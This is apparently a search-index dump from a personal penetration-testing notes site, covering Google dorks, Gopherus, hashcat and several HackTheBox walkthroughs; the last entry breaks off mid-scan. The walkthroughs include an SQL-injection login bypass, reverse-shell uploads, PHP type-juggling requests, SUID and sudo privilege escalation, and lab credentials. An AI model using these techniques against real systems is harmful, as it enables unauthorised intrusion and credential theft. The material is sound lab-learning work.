                        | intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool | This is one of my favorite queries. It lists potentially exposed API keys. |
                        | site:*.domain.com | Enumerates subdomains for the given domain \"domain.com\". |
                        | site:*.domain.com filetype:pdf sales | Searches for pdf files named \"sales\" in all subdomains. |
                        | cache:domain.com/page | Displays the google.com cache of that page. |
                        | inurl:passwd.txt | Retrieves pages that contain that in the url. |
                        ","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gopherus/","title":"Gopherus - a tool for exploiting SSRF","text":"

                        This tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution)

                        ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"gopherus/#installation","title":"Installation","text":"
                        git clone https://github.com/tarunkant/Gopherus.git\n\ncd Gopherus\nchmod +x install.sh\n# Run the installer (may require sudo)\n./install.sh\n
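
                        After installing, a typical invocation looks like this (payload types include mysql, fastcgi, redis and smtp; check the tool's help for the full list):

                        gopherus --exploit mysql\n# Outputs a gopher:// payload to feed into the SSRF entry point\n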
                        ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"grep/","title":"grep","text":"

                        It filters command output.

                        # -C 5: return 5 lines above and below each line where the pattern matches\ncat text.txt | grep -C 5 \"password\"\n
                        ","tags":["pentesting","reconnaissance"]},{"location":"hashcat/","title":"Hashcat - A password recovery tool","text":"

                        Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. Wikipedia

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#installation","title":"Installation","text":"

                        Download from: https://hashcat.net/hashcat/.

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#basic-commands","title":"Basic commands","text":"
                        # Get help \nhashcat --help \n\n# To crack a hash with a dictionary\nhashcat -m 0 -a 0 -D2 example0.hash example.dict\n# -m:  to specify the module of the algorithm we'll be running. Then -m 0 specifies an MD5 type of hash\n# -a: type of attack. Then -a 0 is a dictionary attack\n# -D2: only use OpenCL device type 2 (GPU)\n# Results are stored in the file hashcat.potfile\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules","title":"Modules","text":"

                        One of the most difficult parts is setting the mode. See https://hashcat.net/wiki/doku.php?id=example_hashes.

                        One common error is:

                        Approaching final keyspace - workload adjusted.           \nSession..........: hashcat                                \nStatus...........: Exhausted\n

                        An \"Exhausted\" status means hashcat went through the entire keyspace without recovering the hash, so a larger wordlist, rules, or a different attack mode is needed. Independently of that, the '-w' flag sets the workload profile; -w 3 specifically sets it to \"Insane\" to speed up long-running attacks.
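
                        For instance, the dictionary attack from above with the workload profile raised (a sketch):

                        hashcat -m 0 -a 0 -w 3 example0.hash example.dict\n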

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#rules","title":"Rules","text":"

                        Located at: /usr/share/hashcat/rules/.

                        You can create rules by creating a file called custom.rule and using these commands: https://hashcat.net/wiki/doku.php?id=rule_based_attack.

                        After that use the flag -r to be able to use the rule created:

                        hashcat -m 0 -a 0 -D2 example0.hash example.dict -r rules/custom.rule\n# Press [s] during the run to check the status at any time\n

                        Generate a mutate password list based on a custom.rule:

                        hashcat --force password.list -r custom.rule --stdout > mutated_password.list\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mask-attacks","title":"Mask attacks","text":"

                        These are the possible masks that you can use:

                        ?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?h = 0123456789abcdef\n?H = 0123456789ABCDEF\n?s = \u00abspace\u00bb!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\nc = Capitalize the first letter and lowercase others (rule syntax)\nsXY = Replace all instances of X with Y (rule syntax)\n$! = Append the exclamation character at the end (rule syntax)\n

                        Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mutated_password.list accordingly.

                        Example of a mask attack:

                        hashcat -m 0 -a 3 example0.hash ?l?l?l?l?l?l?l?l?a\n# first 8 characters will be lowercase and the ninth one will be from the all-character pool\n

                        Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
                        cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\n\ncat hash\n\nMS_Word_Document.docx:$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\n# Remove the first part (the file name). The hash would be:\n$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nhashcat -a 0 -m 9600 --status hash /root/Desktop/wordlists/1000000-password-seclists.txt --force\n# -a 0: dictionary mode\n# -m 9600: Set method to MS Office 2013\n# --status : Enable automatic update of the status screen\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#resources","title":"Resources","text":"

                        Examples: cracking common hashes: https://infosecwriteups.com/cracking-hashes-with-hashcat-2b21c01c18ec.

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules-cheatsheet","title":"Modules cheatsheet","text":"

                        https://hashcat.net/wiki/doku.php?id=example_hashes

                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-7300-ipmi","title":"mode 7300: IPMI","text":"

                        For cracking hashes from the IPMI service. In the event of an HP iLO using a factory default password (eight characters of uppercase letters and digits), we can use this Hashcat mask attack command:

                        hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n# -1 ?d?u: define custom charset 1 as digits plus uppercase letters\n# ?1?1?1?1?1?1?1?1: try every 8-character combination of that charset\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#module-5600","title":"Module 5600","text":"

                        All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

                        hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-1800-unshadow-file","title":"Mode 1800: unshadow file","text":"
                        hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n
                        ","tags":["pentesting","enumeration","cracking tool"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/","title":"How to resolve run-of-the-mill connection problems","text":"
                        # Check connection\nping 8.8.8.8\n\n# Check domain resolver\nping google.com\n\n# If pinging 8.8.8.8 works but pinging google.com doesn't, check dns file resolver\n    # Add a new line: \n    # nameserver 8.8.8.8\nsudo nano /etc/resolv.conf\n\n# Check the networking service status\nsudo service networking status\n
                        ","tags":["dns","ping","connection problems"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/#prevent-etcresolvconf-from-updating","title":"Prevent /etc/resolv.conf from updating","text":"

                        By default, NetworkManager dynamically updates the\u00a0/etc/resolv.conf\u00a0file with the DNS settings from active NetworkManager connection profiles. However, you can disable this behavior and manually configure DNS settings in\u00a0/etc/resolv.conf. Steps:

                        1. As the root user, create the\u00a0/etc/NetworkManager/conf.d/90-dns-none.conf\u00a0file with the following content by using a text editor:

                        [main]\ndns=none\n

                        2. Reload the\u00a0NetworkManager\u00a0service:

                        systemctl reload NetworkManager\n

                        After you reload the service, NetworkManager no longer updates the\u00a0/etc/resolv.conf\u00a0file. However, the last contents of the file are preserved.

                        3. Optionally, remove the\u00a0\"Generated by NetworkManager\" comment from\u00a0/etc/resolv.conf\u00a0to avoid confusion.
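
                        A one-liner sketch for that optional cleanup (review the file before editing it in place):

                        sudo sed -i '/Generated by NetworkManager/d' /etc/resolv.conf\n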

                        Verification

                        1. Edit the\u00a0/etc/resolv.conf\u00a0file and manually update the configuration.

                        2. Reload the NetworkManager\u00a0service:

                        systemctl reload NetworkManager\n

                        3. Display the /etc/resolv.conf file:

                        cat /etc/resolv.conf\n

                        If you successfully disabled DNS processing, NetworkManager did not override the manually configured settings.

                        ","tags":["dns","ping","connection problems"]},{"location":"htb-appointment/","title":"Appointment - A HackTheBox machine","text":"
                        nmap -sC -A $ip -Pn\n

                        Only port 80 is open.

                        It's a login panel with an SQL injection vulnerability.

                        To get access, enter the following in the username field: 1' OR '1'='1';#
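
                        The same payload can also be sent from the command line. Note that the endpoint path and form field names below are assumptions for illustration, not values taken from the target:

                        curl -s -X POST \"http://$ip/index.php\" --data-urlencode \"username=1' OR '1'='1';#\" --data-urlencode \"password=anything\"\n# Hypothetical request: adjust the path and parameter names to match the actual login form\n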

                        ","tags":["walkthrough"]},{"location":"htb-archetype/","title":"Archetype - A Hack the Box machine","text":"
                        nmap  -sC -sV $ip -Pn\n

                        Open ports: 135, 139, 445, 1433.

                        First, exploit port 445. With smbclient, you can download the file prod.dtsConfig, which contains credentials for the MSSQL database.
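
                        A minimal smbclient session for that step (the backups share name comes from enumerating this box; -N requests a null session):

                        # List shares anonymously\nsmbclient -N -L //$ip\n\n# Connect to the share and download the config file\nsmbclient -N //$ip/backups -c 'get prod.dtsConfig'\n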

                        With those credentials, you can follow the instructions from this impacket module to exploit the service and get a reverse shell with nc64.exe.
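
                        A connection sketch with impacket's mssqlclient.py (the script path mirrors the psexec.py path used below; the sql_svc username matches the home directory seen later, adjust if different):

                        python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHETYPE/sql_svc@$ip -windows-auth\n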

                        With that, you will get user.txt in Desktop.

                        For escalation of privileges, see technique Recently accessed files and executed commands.

                        type C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n

                        With admin credentials, you can use impacket's psexec.py module to get an interactive shell on the Windows host with admin rights.

                        python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\\!\\!@10.129.95.187\n
                        ","tags":["walkthrough"]},{"location":"htb-bank/","title":"Bank - A HackTheBox machine","text":"

                        The entire exploitation of this machine depends on:

                        • reconnaissance phase: being able to determine that some \"dns digging\" or \"/etc/hosts\" changes must be done. Also, there is some guessing. You need to assume that bank.htb is a valid domain for a DNS zone transfer... mmm weird.
                        • enumeration phase: using the right dictionary to locate a data breach with a password for access.

                        Later on, other skills are appreciated, such as reading comments on source code.

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#users-flag","title":"User's flag","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#reconnaisance","title":"Reconnaisance","text":"
                        nmap -sV -sC -Pn -p- $ip\n

                        Results:

                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 08eed030d545e459db4d54a8dc5cef15 (DSA)\n|   2048 b8e015482d0df0f17333b78164084a91 (RSA)\n|   256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)\n|_  256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)\n53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\n80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n| http-title: HTB Bank - Login\n|_Requested resource was login.php\n|_http-server-header: Apache/2.4.7 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Let's check UDP connections to port 53:

                        sudo nmap -sU -sC -sV -Pn 10.129.29.200 -p53\n

                        Results:

                        PORT   STATE SERVICE VERSION\n53/udp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

                        Open the browser and examine http://10.129.29.200, which shows an Apache web server banner.

                        Since the DNS server is running on port 53 TCP/UDP, we can attempt a zone transfer. However, it is worth noting that guessing bank.htb as a valid zone for this transfer is not a very realistic or scientific approach to penetration testing. Nevertheless, since this is HackTheBox and we are playing this game, let's allow ourselves to go with the flow.

                        Go here for \"digging more into DNS transfer zones\".

                        dig axfr bank.htb @10.129.29.200\n

                        Results:

                        ; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.129.29.200\n;; global options: +cmd\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\nbank.htb.               604800  IN      NS      ns.bank.htb.\nbank.htb.               604800  IN      A       10.129.29.200\nns.bank.htb.            604800  IN      A       10.129.29.200\nwww.bank.htb.           604800  IN      CNAME   bank.htb.\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\n

                        Add those results to /etc/hosts:

                        echo \"10.129.29.200   bank.htb chris.bank.htb ns.bank.htb www.bank.htb\" | sudo tee -a /etc/hosts \n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#enumeration","title":"Enumeration","text":"
                        whatweb http://bank.htb\n

                        Results:

                        http://bank.htb [302 Found] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], RedirectLocation[login.php], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.21]                                                                                                       \nhttp://bank.htb/login.php [200 OK] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], PasswordField[inputPassword], Script, Title[HTB Bank - Login], X-Powered-By[PHP/5.5.9-1ubuntu4.21]\n

                        After browsing the site, reading the source code and trying some SQL injections, let's do some more enumeration.

                        gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \n

                        Results:

                        /uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]\n/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]\n/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]\n/server-status        (Status: 403) [Size: 288]\n/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]\n

                        We have a data breach under http://bank.htb/balance-transfer/

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#exploitation","title":"Exploitation","text":"

                        Browsing that exposed URL, we can sort the directory listing by file size. That is a quick way to spot the file that contains the credentials (it has a different size from the others). Again, this is HackTheBox and not reality. In the real world you would probably download all the files as silently as possible for further processing, as sketched below.
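
                        A sketch of that quieter approach:

                        # Mirror the exposed directory, then sort the files by size to spot the odd one out\nwget -r -np -q http://bank.htb/balance-transfer/\nls -laS bank.htb/balance-transfer/ | head\n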

                        But this is HackTheBox and we have credentials to proceed to the next step. Login into the dashboard http://bank.htb/login.php:

                        --ERR ENCRYPT FAILED\n+=================+\n| HTB Bank Report |\n+=================+\n\n===UserAccount===\nFull Name: Christos Christopoulos\nEmail: chris@bank.htb\nPassword: !##HTBB4nkP4ssw0rd!##\nCreditCards: 5\nTransactions: 39\nBalance: 8842803 .\n===UserAccount===\n

                        Browsing around a little, and reading source code, you can easily find a valuable debug comment:

                        With this, I just changed my pentesmonkey file extension to .htb and uploaded it. Under the \"Attachment\" column in the dashboard, you have the link to the uploaded file.

                        Start a netcat listener:

                        nc -lnvp 1234\n

                        In my case, I clicked on http://bank.htb/uploads/pentesmonkey.htb and got a reverse shell.

                        Cat the user.txt

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#flag-roottxt","title":"Flag root.txt","text":"

                        After some basic reconnaissance, I run:

                        find / -perm /4000 2>/dev/null\n

                        And results:

                        /var/htb/bin/emergency\n/usr/lib/eject/dmcrypt-get-device\n/usr/lib/openssh/ssh-keysign\n/usr/lib/dbus-1.0/dbus-daemon-launch-helper\n/usr/lib/policykit-1/polkit-agent-helper-1\n...\n

                        /var/htb/bin/emergency catches our attention immediately. Running strings on it, we can see that it contains a \"/bin/bash\" command. After solving this machine, I read this writeup and got some insights about how to investigate an ELF file beyond running strings. In that writeup, an md5sum is computed, and googling the hash reveals that this ELF file is in reality a dash shell.
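
                        A quick triage sketch along those lines:

                        strings /var/htb/bin/emergency\nmd5sum /var/htb/bin/emergency\n# Search the resulting hash online: it matches a known dash shell binary\n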

                        Nice. Run the binary and you are root.

                        /var/htb/bin/emergency\n
                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-base/","title":"Base - A Hack The Box machine","text":"

                        Enumerate open ports and services.

                        nmap -sC -sV $ip -Pn\n

                        Ports 22 and 80 are open.

                        Add base.htb to /etc/hosts.
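
                        For instance:

                        echo \"$ip   base.htb\" | sudo tee -a /etc/hosts\n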

                        Enumerate directories:

                        gobuster dir -u http://base.htb/login -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt\n

                        Some file and folders uncovered:

                        - http://base.htb/_uploaded/\n- http://base.htb/login/\n- http://base.htb/login/login.php\n- http://base.htb/forms/\n- http://base.htb/assets/\n- http://base.htb/logout.php\n

                        Under /login there are three files: login.php, config.php and login.php.swp. There are two ways of reading the swap file, with strings and with vim:

                        vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n
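
                        Or, alternatively, dump the printable strings:

                        strings login.php.swp\n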

                        Content:

                        <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

                        Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator \u201c===\u201d instead of the loose comparison operator \u201c==\u201d. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                        My notes about php type juggling.

                        In the HackTheBox machine Base, the login form was bypassable by entering an empty array into the username and password parameters:

                        Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                        Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

                        How to know? By spotting the file login.php.swp in the /login exposed directory and reading its contents.

                        After sending the request with BurpSuite, grab the PHPSESSID cookie, set it in your browser, and go to http://base.htb/upload.php. Now you can upload the pentesmonkey shell using BurpSuite Repeater (important note: change the header to \"Content-Type: image/png\"; the file extension may remain php). Have your netcat listener ready.

                        whoami\n
                        www-data\n

                        Credentials can be found at /var/www/html/login/config.php. Use them to log in as the existing user in /home:

                        su john\n# enter password: thisisagoodpassword\n

                        Once you are john, you have access to user.txt. Also, to be root:

                        id\nsudo -l\n
                        john@base:~$ sudo -l\nsudo -l\n[sudo] password for john: thisisagoodpassword\n\nMatching Defaults entries for john on base:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser john may run the following commands on base:\n    (root : root) /usr/bin/find\n

                        See cheat sheet about suid binaries and:

                        sudo find . -exec /bin/sh \\; -quit\n

Now you are root and can read /root/root.txt.

                        ","tags":["walkthrough","php type juggling","reverse shell","suid binary","linux privilege escalation"]},{"location":"htb-crocodile/","title":"Crocodile - A HackTheBox machine","text":"
```bash
nmap -sC -A $ip -Pn
```

                        Results:

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Smash - Bootstrap Business Template
Service Info: OS: Unix
```

                        Now we enumerate directories:

```bash
gobuster dir -e -u http://10.129.1.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -r
```

                        Results:

```
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.1.15/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2023/05/01 16:21:20 Starting gobuster in directory enumeration mode
===============================================================
http://10.129.1.15/assets               (Status: 200) [Size: 1703]
http://10.129.1.15/css                  (Status: 200) [Size: 1350]
http://10.129.1.15/js                   (Status: 200) [Size: 1138]
http://10.129.1.15/fonts                (Status: 200) [Size: 1968]
http://10.129.1.15/dashboard            (Status: 200) [Size: 1577]
http://10.129.1.15/server-status        (Status: 403) [Size: 276]
Progress: 220534 / 220561 (99.99%)
===============================================================
2023/05/01 16:29:51 Finished
===============================================================
```

At the same time, we explore the FTP service. Anonymous login is allowed.

```bash
ftp 10.129.1.15
dir
mget *
```

                        Two files are downloaded.

```bash
cat allowed.userlist
```

                        Results:

```
aron
pwnmeow
egotisticalsw
admin
```

                        And passwords:

```bash
cat allowed.userlist.passwd
```

                        Results:

```
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
```
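With a user list and a password list in hand, the combination could also be sprayed automatically. A sketch only: the /login.php path, the field names and the failure string are assumptions, so adjust them to what the actual login page source shows:

```bash
# Pair every user with every password against the login form (path/fields/failure string assumed).
hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.1.15 \
      http-post-form "/login.php:Username=^USER^&Password=^PASS^:Incorrect"
```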

Now we can log in at http://10.129.1.15/dashboard with the admin credentials. The flag is in the main panel.

                        ","tags":["walkthrough"]},{"location":"htb-explosion/","title":"Explosion - A HackTheBox machine","text":"
```bash
nmap -sC -sV $ip -Pn
```

```
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: EXPLOSION
|   NetBIOS_Domain_Name: EXPLOSION
|   NetBIOS_Computer_Name: EXPLOSION
|   DNS_Domain_Name: Explosion
|   DNS_Computer_Name: Explosion
|   Product_Version: 10.0.17763
|_  System_Time: 2023-04-27T10:42:37+00:00
|_ssl-date: 2023-04-27T10:42:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Explosion
| Issuer: commonName=Explosion
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-26T10:27:02
| Not valid after:  2023-10-26T10:27:02
| MD5:   2446e544fced2077f37238e35735b16e
| SHA-1: cace39c8a8b0ae2a4bf509705cc78f084b9aec0b
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQadtbfAUkgr5BZjE2eNbcBzANBgkqhkiG9w0BAQsFADAU
| MRIwEAYDVQQDEwlFeHBsb3Npb24wHhcNMjMwNDI2MTAyNzAyWhcNMjMxMDI2MTAy
| NzAyWjAUMRIwEAYDVQQDEwlFeHBsb3Npb24wggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQDSS2eXLWZRkoPS26o641YgH94ZMh9lCyaz2qMPhHsbjNGwZSTC
| WY+Pm8nAROk5HTTq0CYHWyKZN7I2dONAG42I6pRWdpV3k5NwTj3wCR7BB1WqL5mB
| CTN7LxfEzngrdU1tPI6FdSkI12I+2h+ckz+2lUaY58+3ENNGe06U82jE8RrEmnFd
| 0Is0UvA3D3ec2Mzr1Ji8LRko3/rMhggn9T5n75Kh0PstZoRdN+XVjcKfazIfhkZb
| Wz0/BXcB5fwfSGOWaKcHIL26IviI8DbgS46d4Ydw0tGWE+8BHt3jizillCueg03v
| TYj4W6d9nqDB1/QmUz9w1tqviUZM7qPCK6qxAgMBAAGjJDAiMBMGA1UdJQQMMAoG
| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEANyNIxLXD
| ftgW+zs+5JGz2WbeLauLLWE3+LJNfMxGWZr9BJAaF4VX0V/dXP3MXLywhqsz+V56
| mam2jNi44nu4ov+1FgqPKsRdUEb8uOocWEAUE28L48Eh0M09JjVg639REwzqohPV
| KyqdnHhPkCNH3Js8nJCZkAl6EgWJMWLenD0htNTkJHjtHSR0D3Dyc08WsMPmyOtX
| m+4Oi8RS7qrHYG0nCvQmJpvNO9eiqYfVVzP5Q06K45hZ/xlVTVePhJFxdVGcc7CH
| qEILmRdzuvKaRpAD6QocoUm8I3wogOTTV4DcsNOnNSLoFj/TI8i5FV791lZDEzcL
| bWFK5GD+11kCOw==
|_-----END CERTIFICATE-----
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-27T10:42:40
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 37798/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 6858/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 35582/udp): CLEAN (Timeout)
|   Check 4 (port 50597/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
```

After going through all open ports, running the nmap RDP scripts against 3389 gives us interesting results:

```bash
nmap -Pn -sV -p3389 --script rdp-* $ip
```

The resolution of this machine is in the port 3389 tricks notes.
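For reference, the usual path on this box is RDP with the built-in Administrator account and a blank password. A sketch, assuming xfreerdp is installed and the account really has no password set (older xfreerdp builds spell the flag /cert-ignore):

```bash
# Connect over RDP as Administrator with an empty password (assumption for this box).
xfreerdp /v:$ip /u:Administrator /p:'' /cert:ignore
```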

                        ","tags":["walkthrough"]},{"location":"htb-friendzone/","title":"Walkthrough - Friendzone, a Hack The Box machine","text":"
```bash
nmap -sC -sV $IP -Pn
```

```
└─$ nmap -sC -sV $IP -Pn          
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 18:23 EDT
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 14.29% done; ETC: 18:23 (0:00:00 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 28.57% done; ETC: 18:23 (0:00:00 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 28.57% done; ETC: 18:23 (0:00:15 remaining)
Nmap scan report for 10.129.228.87
Host is up (0.045s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)
|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)
|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
